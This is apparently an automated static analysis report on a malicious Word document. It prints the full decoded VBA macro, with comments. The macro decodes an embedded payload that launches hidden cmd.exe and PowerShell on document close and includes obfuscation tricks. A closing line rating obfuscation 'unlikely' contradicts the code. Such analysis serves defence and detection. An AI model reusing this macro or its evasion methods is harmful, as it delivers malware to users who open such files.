Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 eafc44e91530127b…

MALICIOUS

Office (OOXML)

44.6 KB Created: 2017-05-22 22:37:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2020-02-04
MD5: 9845ccaaf3c4fe109bda24adc6b93dbf SHA-1: d229149bc19716ec4edaf3be9929706116953cc0 SHA-256: eafc44e91530127b5ac46763dc14015963b77c2c52846ec7da42c50ecbaabb54
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OOXML document containing VBA macros, as indicated by the 'OOXML_VBA' heuristic and the presence of 'macros.bas' and 'vbaProject_00.bin'. The VBA code includes a function 'rischio' that takes a string argument and calls 'orefice', and a subroutine 'flemma' that calls 'rischio' with a constructed string derived from 'privato()'. This suggests the macro is designed to execute arbitrary commands, likely downloading and running a second-stage payload. The ClamAV detection further confirms its malicious nature. The specific family is not identifiable from the provided evidence.

Heuristics 3

  • ClamAV: Doc.Malware.Xenon-10059125-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Xenon-10059125-0
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All six URLs listed here are standard OOXML / Word XML namespace identifiers found in any .docx, not network indicators; the network activity of this sample is inside the encoded macro payload, not in the document body.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4931 bytes
SHA-256: 53e5246eb7222a476fdd060ed72f4d24906eca2eaced55cce3d4baa937e26c34
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ThisDocument stream as decoded by olevba. The Attribute lines above are the
' ordinary header of a Word document module; everything of interest is in the
' procedures below. Identifiers throughout (rischio, flemma, orefice, ...) are
' random Italian words and carry no meaning.
Option Explicit

' The module's only process-creation primitive: kernel32!WinExec, declared for
' both 32- and 64-bit Office so the macro runs under either bitness. The
' parameter names (trachea, isolato) are as arbitrary as every other name here.
' A Declare of WinExec in a Word VBA project is a strong static signal on its
' own; see orefice for the call site.
#If Win64 Then
Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal trachea As String, ByVal isolato As Long) As Long
#ElseIf Win32 Then
Private Declare Function WinExec Lib "kernel32" (ByVal trachea As String, ByVal isolato As Long) As Long
#End If

' Relay invoked by name through Application.Run (see flemma) rather than called
' directly, which hides the call edge from a naive reading of the source.
' esaudire: the already-decoded (still reversed) command line.
' Replace(esaudire, "", "") replaces nothing with nothing -- a no-op that only
' adds noise. The real work is the call to orefice. No return type is declared
' and nothing is assigned, so the function returns Empty.
Public Function rischio(esaudire As String)
  esaudire = Replace(esaudire, "", "")
  Call orefice(esaudire)
End Function

' Stage 1: decode the embedded payload and hand it on to rischio.
' erba   = "DCED" is the decoding key (each letter becomes a shift via atavico).
' fanale = the encoded blob returned by privato().
' pitone and nebulosa are decoys: Trim("") is "" and Len("giove") is 5, so the
' guard `nebulosa <> (0 + 1)` is always True. Always-true guards and the
' Application.Run-by-name indirection recur in this module and exist only to
' make static reading and simple emulation harder.
Public Sub flemma()
  Dim erba As String
  Dim fanale As String
  erba = "DCED"
  fanale = privato()


  Dim pitone As String
  pitone = Trim("")

  Dim nebulosa As Integer
  nebulosa = Len("giove")

  Dim merlo As String
  merlo = tricheco(fanale, erba)   ' decoded payload, character order reversed (see tricheco)
  If nebulosa <> (0 + 1) Then      ' always True (5 <> 1)
    Application.Run "rischio", merlo
  End If
End Sub


' Per-character decode step: returns urgenza - pepita - 1, where urgenza is the
' ciphertext character code (Asc) and pepita is the key index 0..4 produced by
' atavico. Int() on an Integer expression changes nothing; it is more noise.
Public Function gallina(urgenza As Integer, pepita As Integer) As Integer
  gallina = Int(urgenza - pepita - 1)
End Function

' Key schedule: extends the key string snellire by cycling its own characters
' until the result is indagine characters long. LenB(snellire) / 2 is the
' character count (VBA strings are UTF-16 internally, so LenB is twice Len).
' If indagine <= Len(snellire) the loop never runs and the key is returned as
' is. tricheco calls this with the ciphertext length so that every ciphertext
' position has a key character at the same index.
Public Function buca(snellire As String, indagine As Integer) As String
   Dim simulato As Integer
   Dim pendice As String
   pendice = snellire
   
   Dim botanico As Integer
   botanico = 0
   
   For simulato = (LenB(snellire) / 2) To indagine - 1
     If botanico = (LenB(snellire) / 2) Then   ' wrap back to the start of the key
       botanico = 0
     End If
     
     pendice = pendice & Mid(snellire, botanico + 1, 1)
     
     botanico = botanico + 1
   Next
   
   buca = pendice
End Function


' Maps a key character to its shift index: the position of registro in "ABCDE"
' minus one, i.e. A -> 0, B -> 1, C -> 2, D -> 3, E -> 4 (the keys in this
' module use only B..E). There is no early exit, so the last match would win;
' irrelevant here because the letters are unique. No return type is declared,
' so for a character outside "ABCDE" nothing is assigned and the function
' returns Empty, which becomes 0 when stored in the Integer `sonda` in tricheco
' (an unknown key character would therefore act as shift 1).
Public Function atavico(registro As String)
  Dim consumo As String
  Dim parcella As Integer
  consumo = "ABCDE"
  
  Dim currentregistro As String

  For parcella = 1 To 5
    currentregistro = Mid(consumo, parcella, 1)
    If currentregistro = RTrim(registro) Then
       atavico = parcella - 1
    End If
    
  Next
  
End Function

' Entry point. Document_Close fires when the document is closed, so the whole
' chain Document_Close -> flemma -> rischio -> orefice -> WinExec runs at close
' time, not at open time: a dynamic analysis that opens the file but never
' closes it will not observe the process creation. `2 = (1 + 1)` is always True.
Private Sub Document_Close()
  If 2 = (1 + 1) Then
    Application.Run "flemma"
  End If
End Sub

' Decoder. sbuffare = ciphertext, pianta = key.
' 1. buca stretches the key to the ciphertext length. pianta is ByRef (the VBA
'    default), so the caller's key variable is overwritten with the stretched
'    key -- harmless, the caller does not reuse it.
' 2. For each position, atavico turns the key letter into an index 0..4 and
'    gallina computes ciphertext code - index - 1: a Vigenere-style subtraction
'    with per-position shifts of 1..5.
' 3. Each decoded character is PREPENDED to elsa (`Chr(...) + elsa`), so the
'    result is the plaintext reversed; orefice undoes this with StrReverse.
'    The trailing RTrim("") is "" and contributes nothing.
' Returns the reversed plaintext.
Public Function tricheco(sbuffare As String, pianta As String) As String
  
  Dim sonda As Integer
  Dim truccato As Integer

  Dim mordere As String
  mordere = buca(pianta, Len(sbuffare))

  pianta = mordere

  Dim venato

  Dim elsa As String
  elsa = ""
  
  Dim trachea As String
  Dim insonnia As String
  For venato = 1 To (LenB(sbuffare) / 2)

    insonnia = Mid(pianta, venato, 1)   ' key character at this position
    sonda = atavico(insonnia)           ' key index 0..4
    trachea = Mid(sbuffare, venato, 1)  ' ciphertext character

    truccato = Asc(trachea)

    Dim slogatura As Integer
    slogatura = gallina(truccato, sonda)

    elsa = Chr(slogatura) + elsa + RTrim("")   ' prepend: output ends up reversed
    
  Next
  
  tricheco = elsa
  
End Function

' Stage 2: assembles the command line and executes it.
' vivanda  : reversed decoded payload, passed in from flemma via rischio.
' esaudire : tricheco("gpi3izg", "DCEEDBBD"). Applying the decoder by hand to
'            these two visible constants gives "cmd.exe" reversed (confirm by
'            running the decoder in a sandbox).
' StrReverse(vivanda + " " + esaudire) therefore yields "cmd.exe <payload>".
' The same hand decoding of the privato() blob with key "DCED" begins
' "/c powershell -nop -Exec Bypass -Command", so the process chain to look for
' in endpoint telemetry is WINWORD.EXE -> cmd.exe -> powershell.exe with a
' hidden window. Len("") is 0 = SW_HIDE for WinExec's uCmdShow argument. The
' return value (monastero) is never checked.
' The guard `Len(ActiveDocument.Content.Text) <> 2` is only False when the
' body text is exactly two characters long, so it is effectively always True
' for a real document.
Public Function orefice(vivanda As String)
  Dim esaudire As String
  esaudire = tricheco("gpi3izg", "DCEEDBBD")

  Dim monastero As Integer
 
  If Len(ActiveDocument.Content.Text) <> 2 Then
    monastero = WinExec(StrReverse(vivanda + " " + esaudire), Len(""))
  End If
End Function


' Returns the encoded command-line payload as a single string, assembled from
' 20-character chunks (the split defeats naive string extraction on the source).
' The characters are not meant to be readable: each is the plaintext character
' code plus a shift of 1..5 chosen by the key "DCED" (see flemma and tricheco).
' Hand-decoding the first two chunks gives "/c powershell -nop -Exec Bypass
' -Command"; the remainder is the PowerShell script itself, which the report
' assesses as a second-stage download-and-run. It is not decoded here -- run
' the decoder in a sandbox to recover the full command and any URL for IoC use.
Public Function privato()
  Dim caduco As String

  caduco = "3f%tszjvwkjpp#2rss%1"

  caduco = caduco + "I{jg$E~tevx$1Ftqqdsh"
  caduco = caduco + "$+Si{0Tfnhhx$V~wxhr2"
  caduco = caduco + "Rhy2[hgGpljrx,3Hszsp"
  caduco = caduco + "sdiJmoj,+kyxt=43hrf{"

  caduco = caduco + "rgf~~} {2ftq3onpy2}g"


  caduco = caduco + "|f3fen,0$'jrz=FTTGFX"
  caduco = caduco + "E#0$+_X^WL3i|h,-?#Xx"
  caduco = caduco + "euy1Tutgivx$(hsz>DUT"


  caduco = caduco + "HDYE+_X^WL3i|h,?,Qj{"
  caduco = caduco + "1Rgnify$W|xxip3Riw3["
  caduco = caduco + "ieHpmhsx-1Is{qqsegXx"


  caduco = caduco + "vlsk,*mxxs?33gte{qie"
  caduco = caduco + "~} ~{1hsq2x2tkuCmgB|"
  caduco = caduco + "g{h+->"


  privato = caduco

End Function

' Remaining streams in the VBA project. Module1, Module2, UserForm1, UserForm2
' and Class1 contain only their Attribute headers in this extract -- no
' procedures -- so all executable code of the sample is in ThisDocument above.
' Empty modules and forms like these are typical leftovers of a template used
' to build the document.
Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C811796E-C44D-420B-8914-A6429A7BC0CA}{D8BEC7BE-3F1E-4782-8AB0-B30430AD8A6A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E53F80C3-7E4C-4BEE-9847-9D5D6F5162C8}{2EBD0471-B40B-44CC-9643-4B7F00223577}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 27648 bytes
SHA-256: c3b26e3bc9b9da1d576fcb25e1575756b92d88713247387e12aa522b9d9febaf
Detection
ClamAV: Doc.Malware.Xenon-10059125-0
Obfuscation or payload: unlikely